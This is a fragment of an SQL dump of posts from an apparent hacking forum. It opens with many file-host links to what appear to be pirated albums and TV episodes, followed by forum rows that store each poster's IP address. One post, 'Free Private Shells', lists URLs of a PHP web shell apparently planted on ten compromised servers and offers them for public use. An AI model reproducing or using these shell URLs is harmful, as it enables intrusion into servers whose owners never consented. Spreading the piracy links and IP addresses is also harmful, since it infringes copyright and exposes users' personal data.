[CODE]http://turbobit.net/yi8tyv56tljl/Rob_Zombie.rar.html[/CODE] [CODE]http://rapidgator.net/file/47259180/Rob_Zombie.rar.html[/CODE] [CODE]http://freakshare.com/files/a5i2f32a/Rob_Zombie.rar.html[/CODE] [CODE]http://uploaded.net/file/7w12a1y7/Rob_Zombie.rar[/CODE] [B]Michael Bolton-Gems and The Very Best Of -2CD 2012[/B] [CODE]http://turbobit.net/fmu6f31qr5dq/Michael_Bolton-Gems_and_The_Very_Best_Of-2CD-2012-SO.rar.html[/CODE] [CODE]http://rapidgator.net/file/47260658/Michael_Bolton-Gems_and_The_Very_Best_Of-2CD-2012-SO.rar.html[/CODE] [CODE]http://freakshare.com/files/ksor5mz0/Michael_Bolton-Gems_and_The_Very_Best_Of-2CD-2012-SO.rar.html[/CODE] [CODE]http://uploaded.net/file/8m52sj8i/Michael_Bolton-Gems_and_The_Very_Best_Of-2CD-2012-SO.rar[/CODE] [B]Circa Survive -Violent Waves 2012[/B] [CODE]http://turbobit.net/e6kxcb1csj9p/Circa_Survive-Violent_Waves-2012-P2P.rar.html[/CODE] [CODE]http://rapidgator.net/file/47260850/Circa_Survive-Violent_Waves-2012-P2P.rar.html[/CODE] [CODE]http://freakshare.com/files/63bni9lz/Circa_Survive-Violent_Waves-2012-P2P.rar.html[/CODE] [B]Marillion - Sounds that Cant Be Made 2012[/B] [CODE]http://turbobit.net/dsdv3ycrsc38/Marillion--Sounds_that_Cant_Be_Made-2012-OMA.rar.html[/CODE] [CODE]http://rapidgator.net/file/47261715/Marillion--Sounds_that_Cant_Be_Made-2012-OMA.rar.html[/CODE] [CODE]http://freakshare.com/files/0axrz30l/Marillion--Sounds_that_Cant_Be_Made-2012-OMA.rar.html[/CODE] [CODE]http://uploaded.net/file/bgvh6hat/Marillion--Sounds_that_Cant_Be_Made-2012-OMA.rar[/CODE] [B]Down - Down IV Part 1 the Purple Ep 2012[/B] [CODE]http://turbobit.net/068mtc46reo4/Down--Down_IV_Part_1-the_Purple_Ep-2012-OMA.rar.html[/CODE] [CODE]http://freakshare.com/files/8npc10eq/Down--Down_IV_Part_1-the_Purple_Ep-2012-OMA.rar.html[/CODE] [B]Kimbra - Vows (iTunes Deluxe Version) 2012[/B] [CODE]http://turbobit.net/059sm9so91t4/Kimbra-Vows_(iTunes_Deluxe_Version)-2012.zip.html[/CODE] [CODE]http://uploaded.net/file/bgvh6hat/Marillion--Sounds_that_Cant_Be_Made-2012-OMA.rar[/CODE] [B]Nine Inch Nails - Pretty Hate Machine[/B] [CODE]http://turbobit.net/ufvyul43lq46/Nine_Inch_Nails_-_Pretty_Hate_Machine.rar.html[/CODE] [CODE]http://turbobit.net/306x5t652478/Nine_Inch_Nails-Pretty_Hate_Machine-Remastered-CD-FLAC-2010-PERFECT.rar.html[/CODE] [CODE]http://freakshare.com/files/36ty6nyc/Nine_Inch_Nails_-_Pretty_Hate_Machine.rar.html[/CODE] [CODE]http://rapidgator.net/file/47264490/Nine_Inch_Nails-Pretty_Hate_Machine-Remastered-CD-FLAC-2010-PERFECT.rar.html[/CODE] [CODE]http://freakshare.com/files/p38tqgp3/Nine_Inch_Nails-Pretty_Hate_Machine-Remastered-CD-FLAC-2010-PERFECT.rar.html[/CODE] [B]Fun - Some Nights DELUXE 2012[/B] [CODE]http://turbobit.net/dk5jcu6g1chn/Fun._Some_Nights_DELUXE_2012.rar.html[/CODE] [CODE]http://freakshare.com/files/am15ay8z/fun._Some_Nights_DELUXE_2012.rar.html[/CODE] [B]Morrissey - 2012 Viva Hate Remastered[/B] [CODE]http://turbobit.net/oub2ovycs9v7/Morrissey.2012.Viva.Hate.Remastered.rar.html[/CODE] [CODE]http://uploaded.net/file/rm4wja6u/Morrissey.2012.Viva.Hate.Remastered.rar[/CODE] [B]Radiohead - OK Computer 1997[/B] [CODE]http://turbobit.net/ezc8xfnf6a0e/Radiohead_OK.Computer_1997.zip.html[/CODE] [CODE]http://freakshare.com/files/6jf92bds/Radiohead_OK.Computer_1997.zip.html[/CODE] [CODE]http://uploaded.net/file/gvxos5r8/Radiohead_OK.Computer_1997.zip[/CODE] [CODE]http://rapidgator.net/file/47264274/Radiohead_OK.Computer_1997.zip.html[/CODE] [B]Michael Learns To Rock - Scandinavia 2012[/B] [CODE]http://turbobit.net/5izarhb8oc5i/Michael_Learns_To_Rock-Scandinavia-2012-pLAN9.rar.html[/CODE] [CODE]http://rapidgator.net/file/47265449/Michael_Learns_To_Rock-Scandinavia-2012-pLAN9.rar.html[/CODE] [CODE]http://freakshare.com/files/nphe4crx/Michael_Learns_To_Rock-Scandinavia-2012-pLAN9.rar.html[/CODE] http://turbobit.net/7d6ss44xuz8c/Behemoth_-_Evangelion_(2009)_320kbps.rar.html http://uploaded.net/file/czo1qghf/Behemoth_-_Evangelion_%282009%29_320kbps.rar [B]Behemoth - The Apostasy (2007) 320kbps[/B] [CODE]http://turbobit.net/3dyrajkxmd72/Behemoth_-_The_Apostasy_(2007)_320kbps.rar.html[/CODE] [CODE]http://uploaded.net/file/1lpjuamq/Behemoth_-_The_Apostasy_%282007%29_320kbps.rar[/CODE] Devin Townsend Project - Epicloud 2012 http://turbobit.net/pz4x6whtpcfj/Devin_Townsend_Project-Epicloud-2012.rar.html http://rapidgator.net/file/47267792/Devin_Townsend_Project-Epicloud-2012.rar.html http://uploaded.net/file/zvw3a6sd/Devin_Townsend_Project-Epicloud-2012.rar [B]Lana Del Rey - Born to Die iTunes Deluxe Version 2012[/B] [CODE]http://turbobit.net/wazvoqlhciz6/Lana_Del_Rey-Born_to_Die_iTunes_Deluxe_Version-2012.zip.html[/CODE] [CODE]http://uploaded.net/file/4mjvfyoe/Lana_Del_Rey_-_Born_To_Die_%28Deluxe_Edition%29_%282012%29.rar[/CODE] [B]Gotye- Making Mirror 2012[/B] [CODE]http://turbobit.net/aonmroyz5xak/Gotye- Making.Mirror.zip.html[/CODE] [CODE]http://freakshare.com/files/d2f8ufru/Gotye-Making-Mirror.zip.html[/CODE] [CODE]http://uploaded.net/file/sjkpwoe9/goy.zip[/CODE] [B]Dinosaur Jr -IBetOnSky 2012[/B] [CODE]http://turbobit.net/hq5ngwkgj8lr/DinosaurJr-IBetOnSky-2012.rar.html[/CODE] [CODE]http://freakshare.com/files/58j44ng8/DinosaurJr-IBetOnSky-2012.rar.html[/CODE] [CODE]http://uploaded.net/file/4iehusrz/DinosaurJr-IBetOnSky-2012.rar[/CODE] [B]Grave Digger 2012 - Clash Of The Gods imited Edition[/B] [CODE]http://turbobit.net/qyb7ocfd1m5i/Grave_Digger_2012_Clash_Of_The_Gods_Limited_Edition.rar.html[/CODE] [B]Melanie C - Stages - iTunes 2012[/B] [CODE]http://turbobit.net/1moyqkvnjts5/MelanieC-Stages-iTunes.rar.html[/CODE] [CODE]http://freakshare.com/files/mx2orveh/MelanieC-Stages-iTunes.rar.html[/CODE] [CODE]http://rapidgator.net/file/47235177/MelanieC-Stages-iTunes.rar.html[/CODE] [B]Making Monsters S02E01 Horrors for Houston 720p HDTV x264-DHD[/B] [CODE]http://turbobit.net/c47kkpjdmwvi/Making.Monsters.S02E01.Horrors.for.Houston.720p.HDTV.x264-DHD.mkv.html[/CODE] [CODE]http://rapidgator.net/file/47768460/Making.Monsters.S02E01.Horrors.for.Houston.720p.HDTV.x264-DHD.mkv.html[/CODE] [CODE]http://freakshare.com/files/uz1gwda2/Making.Monsters.S02E01.Horrors.for.Houston.720p.HDTV.x264-DHD.mkv.html[/CODE] [CODE]http://uploaded.net/file/mnchiluh/Making.Monsters.S02E01.Horrors.for.Houston.720p.HDTV.x264-DHD.mkv[/CODE] [B]Heartland CA S06E03 HDTV x264-2HD[/B] [CODE]http://turbobit.net/lfazzc5lvazx/Heartland.CA.S06E03.HDTV.x264-2HD.mp4.html[/CODE] [CODE]http://freakshare.com/files/u9a3l6v7/Heartland.CA.S06E03.HDTV.x264-2HD.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47766682/Heartland.CA.S06E03.HDTV.x264-2HD.mp4.html[/CODE] [CODE]http://uploaded.net/file/2kcs2tq8/Heartland.CA.S06E03.HDTV.x264-2HD.mp4[/CODE] [B]Castle 2009 S05E02 HDTV XviD-AFG[/B] [CODE]http://turbobit.net/423jq15bhc6k/Castle.2009.S05E02.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://freakshare.com/files/ig15ysr2/Castle.2009.S05E02.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/47766391/Castle.2009.S05E02.HDTV.XviD-AFG.avi.html[/CODE] [B]Hawaii Five-0 2010 S03E02 HDTV x264[/B] [CODE]http://turbobit.net/8qqoyfad6vik/Hawaii.Five-0.2010.S03E02.HDTV.x264-LOL.mp4.html[/CODE] [CODE]http://freakshare.com/files/f6wkv5v3/Hawaii.Five-0.2010.S03E02.HDTV.x264-LOL.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47766387/Hawaii.Five-0.2010.S03E02.HDTV.x264-LOL.mp4.html[/CODE] [CODE]http://uploaded.net/file/pbv7cgsp/Hawaii.Five-0.2010.S03E02.HDTV.x264-LOL.mp4[/CODE] [B]How I Met Your Mother S08E02 720p HDTV X264[/B] [CODE]http://turbobit.net/04ugg5888ou1/How.I.Met.Your.Mother.S08E02.720p.HDTV.X264-DIMENSION.mkv.html[/CODE] [CODE]http://freakshare.com/files/xm7qgnk8/How.I.Met.Your.Mother.S08E02.720p.HDTV.X264-DIMENSION.mkv.html[/CODE] [CODE]http://rapidgator.net/file/47767410/How.I.Met.Your.Mother.S08E02.720p.HDTV.X264-DIMENSION.mkv.html[/CODE] [CODE]http://uploaded.net/file/zslaqltg/How.I.Met.Your.Mother.S08E02.720p.HDTV.X264-DIMENSION.mkv[/CODE] [B]Threesome.s02e01.720p.hdtv.x264[/B] [CODE]http://turbobit.net/1w643gve4scb/Threesome.s02e01.720p.hdtv.x264-tla.mkv.html[/CODE] [CODE]http://freakshare.com/files/aryx72ph/threesome.s02e01.720p.hdtv.x264-tla.mkv.html[/CODE] [CODE]http://rapidgator.net/file/47766359/threesome.s02e01.720p.hdtv.x264-tla.mkv.html[/CODE] [CODE]http://uploaded.net/file/a02clhop/threesome.s02e01.720p.hdtv.x264-tla.mkv[/CODE] [B]The voice s03e08 hdtv x264 2hd[/B] [CODE]http://turbobit.net/fjfzhik91p46/The.voice.s03e08.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://freakshare.com/files/cas010hn/the.voice.s03e08.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47766170/the.voice.s03e08.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://uploaded.net/file/vyvy6ksf/the.voice.s03e08.hdtv.x264-2hd.mp4[/CODE] [B]Dancing with the stars us s15e03 hdtv x264-2hd[/B] [CODE]http://turbobit.net/6j5ibt1vga5c/dancing.with.the.stars.us.s15e03.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://freakshare.com/files/pdbz1q1e/dancing.with.the.stars.us.s15e03.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47766009/dancing.with.the.stars.us.s15e03.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://uploaded.net/file/021d8duw/dancing.with.the.stars.us.s15e03.hdtv.x264-2hd.mp4[/CODE] [B]Warehouse 13 s04e10 hdtv x264-2hd[/B] [CODE]http://turbobit.net/m6i529tt0gji/Warehouse.13.s04e10.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://freakshare.com/files/kt2n5fsk/warehouse.13.s04e10.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47764523/warehouse.13.s04e10.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://uploaded.net/file/eghrx01c/warehouse.13.s04e10.hdtv.x264-2hd.mp4[/CODE] [B]Revolution.2012.S01E03.HDTV.x264[/B] [CODE]http://turbobit.net/ix72et7uv2bu/Revolution.2012.S01E03.HDTV.x264-LOL.mp4.html[/CODE] [CODE]http://freakshare.com/files/mwk0n8mk/Revolution.2012.S01E03.HDTV.x264-LOL.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47764431/Revolution.2012.S01E03.HDTV.x264-LOL.mp4.html[/CODE] [CODE]http://uploaded.net/file/bqu5zt82/Revolution.2012.S01E03.HDTV.x264-LOL.mp4[/CODE] [B]Major Crimes S01E08 HDTV x264[/B] [CODE]http://turbobit.net/r1tn0r1e4mgs/Major.Crimes.S01E08.HDTV.x264-LOL.mp4.html[/CODE] [CODE]http://freakshare.com/files/yjf0zkbh/Major.Crimes.S01E08.HDTV.x264-LOL.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47780264/Major.Crimes.S01E08.HDTV.x264-LOL.mp4.html[/CODE] [CODE]http://uploaded.net/file/eaghc4yr/Major.Crimes.S01E08.HDTV.x264-LOL.mp4[/CODE] [B]The inbetweeners us s01e07 hdtv x264-2hd[/B] [CODE]http://turbobit.net/969corgnw225/the.inbetweeners.us.s01e07.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://freakshare.com/files/im2kygmt/The.Inbetweeners.us.s01e07.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47779641/the.inbetweeners.us.s01e07.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://uploaded.net/file/dm2l7y91/the.inbetweeners.us.s01e07.hdtv.x264-2hd.mp4[/CODE] [B]The X Factor UK S09E10 HDTV x264 [/B] [CODE]http://turbobit.net/8kuvxgoo3yog/The.X.Factor.UK.S09E10.HDTV.x264-DEADPiXEL.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47284899/The.X.Factor.UK.S09E10.HDTV.x264-DEADPiXEL.mp4.html[/CODE] [CODE]http://freakshare.com/files/s714o4e5/The.X.Factor.UK.S09E10.HDTV.x264-DEADPiXEL.mp4.html[/CODE] [CODE]http://uploaded.net/file/wy6bjgc3/The.X.Factor.UK.S09E10.HDTV.x264-DEADPiXEL.mp4[/CODE] [B]Once Upon a Time S02 Special-Magic is Coming HDTV.XviD[/B] [CODE]http://turbobit.net/yt7hjtuhstqe/Once.Upon.a.Time.S02.Special-Magic.is.Coming.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/47285032/Once.Upon.a.Time.S02.Special-Magic.is.Coming.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://freakshare.com/files/qccbh4cd/Once.Upon.a.Time.S02.Special-Magic.is.Coming.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/e8mtnd08/Once.Upon.a.Time.S02.Special-Magic.is.Coming.HDTV.XviD-AFG.avi[/CODE] [B]WWE Friday Night Smackdown 2012 09 28 HDTV x264[/B] [CODE]http://turbobit.net/7opnayg92yzl/WWE.Friday.Night.Smackdown.2012.09.28.HDTV.x264-KYR.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47290463/WWE.Friday.Night.Smackdown.2012.09.28.HDTV.x264-KYR.mp4.html[/CODE] [CODE]http://freakshare.com/files/7v45vdy9/WWE.Friday.Night.Smackdown.2012.09.28.HDTV.x264-KYR.mp4.html[/CODE] [CODE]http://uploaded.net/file/xs19cwiw/WWE.Friday.Night.Smackdown.2012.09.28.HDTV.x264-KYR.mp4[/CODE] [B]Disaster Movie 2008 DvDrip[/B] [CODE]http://turbobit.net/sde8qxqppgy3/Disaster.Movie.2008.DvDrip.avi.html[/CODE] [B]Heartland ca s06e03 hdtv x264-2hd[/B] [CODE]http://turbobit.net/vkz2zahtyrpd/Heartland.ca.s06e03.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://freakshare.com/files/n2uu0ifd/heartland.ca.s06e03.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47514281/heartland.ca.s06e03.hdtv.x264-2hd.mp4.html[/CODE] [CODE]http://uploaded.net/file/sozlp3l6/heartland.ca.s06e03.hdtv.x264-2hd.mp4[/CODE] [B]Bar Rescue S02E10 HDTV XviD AFG[/B] [CODE]http://turbobit.net/ci3f8qg8zu71/Bar.Rescue.S02E10.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/47514367/Bar.Rescue.S02E10.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/q6zb731a/Bar.Rescue.S02E10.HDTV.XviD-AFG.avi[/CODE] [CODE]http://freakshare.com/files/sobtb1vs/Bar.Rescue.S02E10.HDTV.XviD-AFG.avi.html[/CODE] [B]Hell on Wheels S02E08 HDTV XviD-AFG avi[/B] [CODE]http://turbobit.net/ltitd40y1f9k/Hell.on.Wheels.S02E08.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/47515617/Hell.on.Wheels.S02E08.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://freakshare.com/files/usqerdqe/Hell.on.Wheels.S02E08.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/fu6t7dvf/Hell.on.Wheels.S02E08.HDTV.XviD-AFG.avi[/CODE] [B]Metallica - Beyond Magnetic 2011[/B] [CODE]http://turbobit.net/2t5vkw99o2mb/Metallica-Beyond.Magnetic.2011.EP.zip.html[/CODE] [B]Daughtry - Break the Spell (Deluxe Edition)[/B] [CODE]http://turbobit.net/3q5sqlnh4fch/Daughtry - Break the Spell (Deluxe Edition).rar.html[/CODE] [B]Drake - Take Care (iTunes Deluxe Version) 2011[/B] [CODE]http://turbobit.net/b12dhjf2yow2/Drake-Take_Care_(iTunes_Deluxe_Version)-2011.rar.html[/CODE] [B]Aerosmith - The Essential Aerosmith (2011) 320kbps[/B] [CODE]http://turbobit.net/bbcdqkkrzpne/Aerosmith_-_The_Essential_Aerosmith_(2011)_320kbps.rar.html[/CODE] [B]The Offspring - Ignition 2008 [/B] [CODE]http://turbobit.net/aqh64helzpzm/The Offspring - Ignition 2008 - .rar.html[/CODE] [B]Damon Albarn - Dr Dee (2012)[/B] [CODE]http://turbobit.net/6ler0cbolg5z/Damon Albarn - Dr Dee (2012) FLAC.rar.html[/CODE] [B]Slipknot - Iowa (10th Anniversary Edition) 2CD 2011[/B] [CODE]http://turbobit.net/4ihpgal5n5ps/Slipknot-Iowa_(10th_Anniversary_Edition)-2CD-2011-FiH.rar.html[/CODE] [B]Blink - 182 - Greatest Hits 2005 320[/B] [CODE]http://turbobit.net/8nlr8jmyek5f/Blink-182_-_Greatest_Hits_2005_320.zip.html[/CODE][/php] [/quote]', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '30197718cd2f822a2b744ba2f9b6a88f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6119', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '228', 'VirtualLegend', '1350911341', 'I have the Same problem :(', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ae413b935993111c6008e27b83700a47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6120', '1062', '0', '64', 'New movie stream site I found!!', '0', '62', 'R?????zo?', '1350911603', 'Hello guys I just found a new site and I think it\'s awesome, so I decided to share with you guys :) Have a look: http://www.letmewatchthis.com', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', 'b1e13f021a2a99e8866badbe14e381c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6121', '1063', '0', '81', 'Free Private Shells [Updated]', '0', '62', 'R?????zo?', '1350911895', 'Updated list. http://pastebin.com/s3taxucN Don\'t expect them to stay up long, they\'re public now. [hr] Some more: [spoiler] http://187.33.159.118/webdav/shellajejas.php http://200.128.81.23/webdav/shellajejas.php http://74.91.116.127/webdav/shellajejas.php http://187.48.62.39/webdav/shellajejas.php http://118.97.164.18/webdav/shellajejas.php http://222.127.10.240/webdav/shellajejas.php http://119.82.231.91/webdav/shellajejas.php http://193.140.142.110/webdav/shellajejas.php http://188.173.78.190/webdav/shellajejas.php http://120.72.85.84/webdav/shellajejas.php [/spoiler]', '188.140.93.237', '-1131651603', '1', '0', '62', '1350939216', '1', '0f0f07fa649ce0835aeb51a7cc4de7be', '0', '1350939216'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6122', '1037', '5977', '30', 'RE: Empireviews Type 2 Bot', '0', '228', 'VirtualLegend', '1350913591', 'Does it work for youtube to get views?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a055101700244ca51bc5be61ec1821cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6123', '1064', '0', '4', 'Greetings from NowhereLand', '0', '284', 'h3rcul3s', '1350916547', 'New member here. Willing to learn and share knowledge.', '142.4.196.218', '-1912290086', '0', '0', '0', '0', '1', '6ff9a3dedfb3c49ca434179cdba0b491', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6124', '1051', '6060', '58', 'RE: Advertisers Applications', '0', '53', 'sirchamp', '1350918772', '1. Do you have any spare email? I can easily make one. 2. Do you know any hacker blogs? A few.. 3. Can you help advertise on twitter? Yes 4. What search engine do you use? Google and Ecosia 5. Do you upload videos on youtube? Yes. 6. Are you registered on any active site that\'s not related to hacking? Yes. Only one 7. Are you registered on [censored] or ubers? On HF. I love HF. 8. If we provide you with programs and ebooks, can you share them on other sites? Of course.', '107.248.162.109', '1811456621', '1', '0', '0', '0', '1', 'c40f4c4c945b5f2dc46363ac09ef76be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6125', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '53', 'sirchamp', '1350918865', 'If I\'m forced to post... then Ill do it.', '165.42.14.50', '-1523970510', '1', '0', '0', '0', '1', '019d15066bc01031b6bb9ce537fc8078', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6126', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '61', 'NXK', '1350919733', 'Welcome, I hope you enjoy it here.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '9d128dcf535dda3461a2eab69a298950', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6127', '1065', '0', '5', 'We have a problem here.', '0', '61', 'NXK', '1350919907', 'Recently I have been noticing that me and joker are doing more moderating than our actual staff/mods This needs to change soon, We shouldn\'t be doing 100% of moderating. I feel like most of you are just mods right now to have the title mod. Like I said this needs to change.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4f6f8b38a3f8e25788d5ae0b9b774aad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6128', '1066', '0', '48', 'We have a problem here.', '0', '61', 'NXK', '1350919962', 'Recently I have been noticing that me and joker are doing more moderating than our actual staff/mods This needs to change soon, We shouldn\'t be doing 100% of moderating. I feel like most of you are just mods right now to have the title mod. Like I said this needs to change.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '69305906d5a0d35ba913ee4324a58901', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6129', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '228', 'VirtualLegend', '1350921743', 'Welcome to L33tHacking Hercules Stay active and HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7df3b3023c0f1c0ad9ca3402765e93a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6130', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '228', 'VirtualLegend', '1350921857', 'As Always Nice share bro Gonna check it out and SE.net too :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b4c1e84a84c3c3099a06cd0256e9d802', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6132', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '100', '??zg???g????61', '1350922027', 'Thanks for this man, been looking for some more SE tuts. ;D', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'e74802b0197cef9d2615efe2bc836023', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6133', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '62', 'R?????zo?', '1350923416', 'you\'re welcome guys, glad I helped :)', '95.69.16.73', '1598361673', '1', '0', '0', '0', '1', 'ab728f60b885ac17577fffa7e3b9b17f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6134', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '62', 'R?????zo?', '1350923448', 'Welcome to the forums, stay active and HQ Enjoy :)', '95.69.16.73', '1598361673', '1', '0', '0', '0', '1', '26bb4edece6c30b13bbf07cfa43c02f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6135', '1059', '6092', '9', 'RE: new ptc site with more earning option', '0', '84', 'Thunder™', '1350923720', 'Thanks for Share :) will try this.', '111.91.75.60', '1868254012', '0', '0', '0', '0', '1', '6f903d12bcdc8deac8ddcdf590aff19b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6136', '1066', '6128', '48', 'RE: We have a problem here.', '0', '228', 'VirtualLegend', '1350925759', 'I\'m i doing good? so not what do i need to change?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '610f79b06bb3a890b01d14260236b853', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6137', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1350927180', 'Hopefully jok3r can fix it :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'adddab8741ac19e32ae5e4a581014459', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, 